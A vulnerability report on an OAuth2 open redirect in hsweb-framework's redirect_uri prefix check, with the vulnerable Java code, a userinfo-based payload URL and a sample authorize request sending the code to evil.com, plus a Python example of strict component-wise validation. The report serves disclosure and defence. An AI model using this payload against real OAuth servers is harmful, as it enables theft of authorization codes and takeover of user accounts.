| Field | Value |
|---|---|
| Title | GitHub hsweb-framework 5.0.0 Open Redirect |

## Description

### Overview
The OAuth2 authorization endpoint validates `redirect_uri` using a string prefix check, `redirectUri.startsWith(this.redirectUrl)`:

```java
// Call site in the authorization endpoint: falls back to the client's
// registered redirect URL when the request carries no redirect_uri.
String redirectUri = param.getOrDefault("redirect_uri", client.getRedirectUrl());
client.validateRedirectUri(redirectUri);

// OAuth2Client.validateRedirectUri: only checks that the supplied value
// begins with the registered URL, not that it resolves to the same host.
public void validateRedirectUri(String redirectUri) {
    if (ObjectUtils.isEmpty(redirectUri) || (!redirectUri.startsWith(this.redirectUrl))) {
        throw new OAuth2Exception(ErrorType.ILLEGAL_REDIRECT_URI);
    }
}
```
### Impact
Assume an OAuth2 client has registered the following callback URL:

```
https://trusted.example.com
```

An attacker can submit the following `redirect_uri`:

```
https://trusted.example.com:password@evil.com
```

This value passes the `startsWith("https://trusted.example.com")` validation. However, according to URL parsing semantics, the actual destination host is evil.com, while `trusted.example.com:password` is treated as the URL userinfo component.

An attacker could exploit this behavior to redirect the authorization code to evil.com, creating an authorization code leakage risk.

### Simple Verification

```http
GET /oauth2/authorize?response_type=code&client_id=<clientId>&redirect_uri=https://trusted.example.com:password@evil.com/callback&state=audit
```

The validation passes and returns a URL similar to:

```
https://trusted.example.com:password@evil.com/callback?code=<authorization_code>&state=audit
```

If the caller proceeds to redirect to this URL, the authorization code will be sent to the attacker-controlled domain evil.com.
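The following is an added example (not code from hsweb-framework or from the reporter) that puts the report's prefix check beside a component-wise comparison, in Python so the URL-parsing behaviour can be shown with the standard library. It assumes, as a constructed registration, that the client registered the full callback URL `https://trusted.example.com/callback`; the function names `prefix_check`, `strict_check` and `effective_host` are the example's own.

```python
"""Added example: validate an OAuth2 redirect_uri by URL component rather
than by string prefix. Not code from hsweb-framework."""
from urllib.parse import urlsplit

# Constructed registration (assumption): the client registers its full
# callback URL, not just an origin prefix.
REGISTERED_REDIRECT_URIS = ["https://trusted.example.com/callback"]

DEFAULT_PORTS = {"http": 80, "https": 443}


def prefix_check(redirect_uri: str, registered_url: str) -> bool:
    """Mirrors the vulnerable check from the report:
    redirectUri.startsWith(this.redirectUrl)."""
    return bool(redirect_uri) and redirect_uri.startswith(registered_url)


def _components(uri: str):
    """Return (scheme, host, port, path, query) with defaults applied,
    or None when the value cannot be a safe redirect target."""
    try:
        parts = urlsplit(uri)
        port = parts.port          # ValueError on a non-numeric port
    except ValueError:
        return None
    scheme = parts.scheme.lower()
    if scheme not in DEFAULT_PORTS:
        return None
    # A userinfo component ('user:pass@') is never legitimate in a callback
    # URL; it is what lets 'trusted.example.com:password' precede the real
    # host in the report's payload.
    if parts.username is not None or parts.password is not None:
        return None
    if parts.fragment:             # fragments are not sent to the server
        return None
    host = (parts.hostname or "").lower()
    if not host:
        return None
    if port is None:
        port = DEFAULT_PORTS[scheme]
    path = parts.path or "/"
    return (scheme, host, port, path, parts.query)


def strict_check(redirect_uri: str, registered_uris) -> bool:
    """Accept only when scheme, host, port, path and query all equal those
    of a registered URI; a registered value that fails to parse never matches."""
    candidate = _components(redirect_uri)
    if candidate is None:
        return False
    return any(candidate == _components(r) for r in registered_uris)


def effective_host(uri: str) -> str:
    """Host a browser would actually be sent to for this URL."""
    return (urlsplit(uri).hostname or "").lower()


if __name__ == "__main__":
    # Constructed inputs: the report's payload next to the legitimate URL.
    attacker = "https://trusted.example.com:password@evil.com/callback"
    legit = "https://trusted.example.com/callback"
    for uri in (legit, attacker):
        print(f"{uri}\n  host={effective_host(uri)} "
              f"prefix={prefix_check(uri, 'https://trusted.example.com')} "
              f"strict={strict_check(uri, REGISTERED_REDIRECT_URIS)}")
```

The strict check rejects the report's payload because `urlsplit` reports `evil.com` as the host and `trusted.example.com` / `password` as userinfo, which a callback URL never carries. Comparing parsed components, or simply the exact registered string, is the comparison the OAuth 2.0 Security BCP (RFC 9700) requires of authorization servers; a prefix test on the raw string is not a substitute for it.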
| Field | Value |
|---|---|
| Source | https://github.com/hs-web/hsweb-framework/issues/354 |
| User | 0Xrry (UID 86188) |
| Submitted | 2026-05-20 09:37 (21 days ago) |
| Moderation | 2026-06-07 11:40 (18 days later) |
| Status | Accepted |
| VulDB entry | 369097 [hs-web hsweb-framework up to 5.0.1 OAuth2 Client OAuth2Client.java OAuth2Client Redirect] |
| Points | 20 |